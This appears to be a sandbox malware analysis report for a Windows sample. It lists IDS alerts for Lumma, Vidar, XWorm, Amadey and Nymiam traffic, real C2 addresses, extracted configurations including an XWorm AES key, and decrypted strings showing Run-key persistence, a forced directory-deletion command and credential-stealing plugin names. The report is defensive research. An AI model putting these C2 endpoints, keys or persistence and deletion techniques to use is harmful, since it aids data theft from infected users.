2025-01-26T15:29:44.239071+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59921	5.75.209.106	443	TCP
2025-01-26T15:29:46.290575+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59923	5.75.209.106	443	TCP
2025-01-26T15:29:47.377806+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59927	5.75.209.106	443	TCP
2025-01-26T15:29:49.378831+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59930	5.75.209.106	443	TCP
2025-01-26T15:29:50.618311+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59932	5.75.209.106	443	TCP
2025-01-26T15:29:55.748289+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59939	5.75.209.106	443	TCP
2025-01-26T15:29:59.319429+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59944	5.75.209.106	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:27:47.325628+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49843	104.21.76.27	443	TCP
2025-01-26T15:28:15.958642+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	59712	104.21.82.94	443	TCP
2025-01-26T15:28:17.992763+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	59730	104.21.29.142	443	TCP
2025-01-26T15:28:57.011250+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	51713	104.21.82.94	443	TCP

ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:30:24.340566+0100	2842478	1	Malware Command and Control Activity Detected	159.100.19.137	7707	192.168.2.4	59972	TCP
2025-01-26T15:30:30.750779+0100	2842478	1	Malware Command and Control Activity Detected	159.100.19.137	7707	192.168.2.4	59980	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:27:03.868758+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49737	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:27:20.891906+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49738	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:27:10.510612+0100	2803305	3	Unknown Traffic	192.168.2.4	49739	185.215.113.39	80	TCP
2025-01-26T15:27:22.413220+0100	2803305	3	Unknown Traffic	192.168.2.4	49741	185.215.113.39	80	TCP
2025-01-26T15:27:27.848167+0100	2803305	3	Unknown Traffic	192.168.2.4	49743	185.215.113.39	80	TCP
2025-01-26T15:27:35.299562+0100	2803305	3	Unknown Traffic	192.168.2.4	49755	185.215.113.39	80	TCP
2025-01-26T15:27:45.992947+0100	2803305	3	Unknown Traffic	192.168.2.4	49823	185.215.113.39	80	TCP
2025-01-26T15:27:54.624031+0100	2803305	3	Unknown Traffic	192.168.2.4	49869	185.215.113.39	80	TCP
2025-01-26T15:28:04.407558+0100	2803305	3	Unknown Traffic	192.168.2.4	59820	185.215.113.39	80	TCP
2025-01-26T15:28:10.305874+0100	2803305	3	Unknown Traffic	192.168.2.4	59855	185.215.113.39	80	TCP
2025-01-26T15:28:17.556356+0100	2803305	3	Unknown Traffic	192.168.2.4	59732	185.215.113.39	80	TCP
2025-01-26T15:28:31.287830+0100	2803305	3	Unknown Traffic	192.168.2.4	59785	185.215.113.39	80	TCP
2025-01-26T15:28:39.632307+0100	2803305	3	Unknown Traffic	192.168.2.4	59809	185.215.113.39	80	TCP
2025-01-26T15:28:45.358638+0100	2803305	3	Unknown Traffic	192.168.2.4	59829	185.215.113.39	80	TCP
2025-01-26T15:29:06.105896+0100	2803305	3	Unknown Traffic	192.168.2.4	59839	185.215.113.39	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:29:13.636410+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59842	176.113.115.96	443	TCP
2025-01-26T15:29:17.822060+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59848	176.113.115.96	443	TCP
2025-01-26T15:29:20.657175+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59856	176.113.115.96	443	TCP
2025-01-26T15:29:22.423419+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59858	176.113.115.96	443	TCP
2025-01-26T15:29:23.838262+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59862	176.113.115.96	443	TCP
2025-01-26T15:29:25.245575+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59866	176.113.115.96	443	TCP
2025-01-26T15:29:26.576408+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59869	176.113.115.96	443	TCP
2025-01-26T15:29:28.013969+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59874	176.113.115.96	443	TCP
2025-01-26T15:29:29.715192+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59878	176.113.115.96	443	TCP
2025-01-26T15:29:31.026193+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59887	176.113.115.96	443	TCP
2025-01-26T15:29:32.438673+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59892	176.113.115.96	443	TCP
2025-01-26T15:29:33.905131+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59897	176.113.115.96	443	TCP
2025-01-26T15:29:35.316000+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59902	176.113.115.96	443	TCP
2025-01-26T15:29:36.605723+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59907	176.113.115.96	443	TCP
2025-01-26T15:29:38.473327+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59911	176.113.115.96	443	TCP
2025-01-26T15:29:39.925057+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59913	176.113.115.96	443	TCP
2025-01-26T15:29:41.372079+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59915	176.113.115.96	443	TCP
2025-01-26T15:29:42.946957+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59918	176.113.115.96	443	TCP
2025-01-26T15:29:44.443936+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59920	176.113.115.96	443	TCP
2025-01-26T15:29:45.914271+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59922	176.113.115.96	443	TCP
2025-01-26T15:29:47.391250+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59925	176.113.115.96	443	TCP
2025-01-26T15:29:48.870569+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59928	176.113.115.96	443	TCP
2025-01-26T15:29:50.380378+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59931	176.113.115.96	443	TCP
2025-01-26T15:29:51.870777+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59933	176.113.115.96	443	TCP
2025-01-26T15:29:53.486907+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59936	176.113.115.96	443	TCP
2025-01-26T15:29:55.079677+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59938	176.113.115.96	443	TCP
2025-01-26T15:29:56.991365+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59941	176.113.115.96	443	TCP
2025-01-26T15:29:58.401791+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59943	176.113.115.96	443	TCP
2025-01-26T15:29:59.924608+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59945	176.113.115.96	443	TCP
2025-01-26T15:30:01.445257+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59948	176.113.115.96	443	TCP
2025-01-26T15:30:02.883175+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59950	176.113.115.96	443	TCP
2025-01-26T15:30:04.822131+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59953	176.113.115.96	443	TCP
2025-01-26T15:30:06.383136+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59954	176.113.115.96	443	TCP
2025-01-26T15:30:07.912573+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59956	176.113.115.96	443	TCP
2025-01-26T15:30:09.444878+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59957	176.113.115.96	443	TCP
2025-01-26T15:30:10.991074+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59959	176.113.115.96	443	TCP
2025-01-26T15:30:12.575624+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59960	176.113.115.96	443	TCP
2025-01-26T15:30:13.948074+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59962	176.113.115.96	443	TCP
2025-01-26T15:30:15.490086+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59963	176.113.115.96	443	TCP
2025-01-26T15:30:16.788631+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59964	176.113.115.96	443	TCP
2025-01-26T15:30:18.182300+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59966	176.113.115.96	443	TCP
2025-01-26T15:30:19.513905+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59967	176.113.115.96	443	TCP
2025-01-26T15:30:21.112965+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59969	176.113.115.96	443	TCP
2025-01-26T15:30:22.444303+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59970	176.113.115.96	443	TCP
2025-01-26T15:30:24.036584+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59971	176.113.115.96	443	TCP
2025-01-26T15:30:25.353213+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59973	176.113.115.96	443	TCP
2025-01-26T15:30:26.656206+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59975	176.113.115.96	443	TCP
2025-01-26T15:30:28.055184+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59976	176.113.115.96	443	TCP
2025-01-26T15:30:29.540333+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59978	176.113.115.96	443	TCP
2025-01-26T15:30:30.924083+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59979	176.113.115.96	443	TCP
2025-01-26T15:30:32.236308+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59982	176.113.115.96	443	TCP
2025-01-26T15:30:33.536685+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59983	176.113.115.96	443	TCP
2025-01-26T15:30:34.869230+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59985	176.113.115.96	443	TCP
2025-01-26T15:30:36.172106+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59986	176.113.115.96	443	TCP
2025-01-26T15:30:37.623667+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59988	176.113.115.96	443	TCP
2025-01-26T15:30:39.273054+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59989	176.113.115.96	443	TCP
2025-01-26T15:30:40.729981+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59991	176.113.115.96	443	TCP
2025-01-26T15:30:42.032675+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59993	176.113.115.96	443	TCP
2025-01-26T15:30:43.347174+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	59994	176.113.115.96	443	TCP

ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:38.328058+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59812	5.75.209.106	443	TCP
2025-01-26T15:28:39.005925+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59814	5.75.209.106	443	TCP
2025-01-26T15:28:41.204351+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59821	5.75.209.106	443	TCP
2025-01-26T15:28:43.292337+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59823	5.75.209.106	443	TCP
2025-01-26T15:28:44.761128+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59828	5.75.209.106	443	TCP
2025-01-26T15:28:45.978721+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59830	5.75.209.106	443	TCP
2025-01-26T15:28:47.535097+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59831	5.75.209.106	443	TCP
2025-01-26T15:28:48.497379+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59832	5.75.209.106	443	TCP
2025-01-26T15:28:50.680770+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59833	5.75.209.106	443	TCP
2025-01-26T15:29:36.738976+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59908	5.75.209.106	443	TCP
2025-01-26T15:29:37.804967+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59910	5.75.209.106	443	TCP
2025-01-26T15:29:39.967033+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59914	5.75.209.106	443	TCP
2025-01-26T15:29:43.381425+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59919	5.75.209.106	443	TCP
2025-01-26T15:29:44.239071+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59921	5.75.209.106	443	TCP
2025-01-26T15:29:46.290575+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59923	5.75.209.106	443	TCP
2025-01-26T15:29:47.377806+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59927	5.75.209.106	443	TCP
2025-01-26T15:29:49.378831+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59930	5.75.209.106	443	TCP
2025-01-26T15:29:50.618311+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.4	59932	5.75.209.106	443	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:06.085703+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	59827	104.102.49.254	443	TCP
2025-01-26T15:28:15.379605+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	59710	104.102.49.254	443	TCP
2025-01-26T15:28:44.402637+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	59824	104.102.49.254	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:20.469506+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.4	59752	5.75.209.106	443	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:30:04.479969+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.4	59934	TCP
2025-01-26T15:30:16.219743+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.4	59934	TCP
2025-01-26T15:30:28.137463+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.4	59934	TCP
2025-01-26T15:30:40.200614+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.4	59934	TCP
2025-01-26T15:30:47.763968+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.4	59934	TCP
2025-01-26T15:30:47.763988+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.4	59934	TCP
2025-01-26T15:31:12.908071+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.4	59934	TCP
2025-01-26T15:31:14.105951+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.4	59934	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:30:04.683235+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	59934	91.212.166.99	4404	TCP
2025-01-26T15:30:16.223122+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	59934	91.212.166.99	4404	TCP
2025-01-26T15:30:28.141552+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	59934	91.212.166.99	4404	TCP
2025-01-26T15:30:40.205827+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	59934	91.212.166.99	4404	TCP
2025-01-26T15:31:14.457256+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	59934	91.212.166.99	4404	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:30:47.763968+0100	2852874	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.4	59934	TCP
2025-01-26T15:30:47.763988+0100	2852874	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.4	59934	TCP
2025-01-26T15:31:12.908071+0100	2852874	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.4	59934	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:30:04.163601+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.4	59934	91.212.166.99	4404	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:29:54.926728+0100	2853191	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.4	59934	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:29:54.558084+0100	2853192	1	Malware Command and Control Activity Detected	192.168.2.4	59934	91.212.166.99	4404	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:29:27.549444+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	59875	149.154.167.220	443	TCP

Joe Security MALWARE Nymiam - C&C DLL Download Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:29:24.051829+0100	1800003	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP

Joe Security MALWARE Nymiam - C&C DLL Key Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:29:23.707581+0100	1800002	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP

Joe Security MALWARE Nymiam - C&C Files Download Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:29:24.620569+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP
2025-01-26T15:29:26.911899+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP
2025-01-26T15:29:29.246277+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP
2025-01-26T15:29:31.566738+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP
2025-01-26T15:29:33.872725+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP
2025-01-26T15:29:36.203496+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP
2025-01-26T15:29:38.536855+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP
2025-01-26T15:29:40.879480+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP
2025-01-26T15:29:43.237416+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP
2025-01-26T15:29:45.566508+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP
2025-01-26T15:29:47.940611+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP

Joe Security MALWARE Nymiam - C&C Software Download Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:29:51.462254+0100	1800005	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP
2025-01-26T15:29:52.474187+0100	1800005	1	Malware Command and Control Activity Detected	192.168.2.4	59863	185.156.73.23	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 2E02vIiMfd.exe

Avira: detected

Found malware configuration

Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000014.00000003.2709397792.0000000001C1C000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199819539662", "Botnet": "go2dniz"}
Source: 0000002A.00000002.4194977140.0000000002841000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["91.212.166.99"], "Port": 4404, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: BitLockerToGo.exe.3332.30.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": "https://toppyneedus.biz/api", "Build Version": "Jxy8Jp--new"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\1053878001\abd4306087.exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\1053885001\fb2bfd0ee0.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: 2E02vIiMfd.exe	Virustotal: Detection: 62%			Perma Link
Source: 2E02vIiMfd.exe	ReversingLabs: Detection: 63%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 2E02vIiMfd.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 185.215.113.43
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: S-%lu-
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abc3bc1985
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: skotes.exe
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Startup
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Programs
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: %USERPROFILE%
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: clip.dll
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: http://
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: https://
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /quiet
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /Plugins/
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: &unit=
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shell32.dll
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: kernel32.dll
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProgramData\
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: AVAST Software
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Kaspersky Lab
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Panda Security
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Doctor Web
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 360TotalSecurity
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Bitdefender
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Norton
Source: 00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Sophos
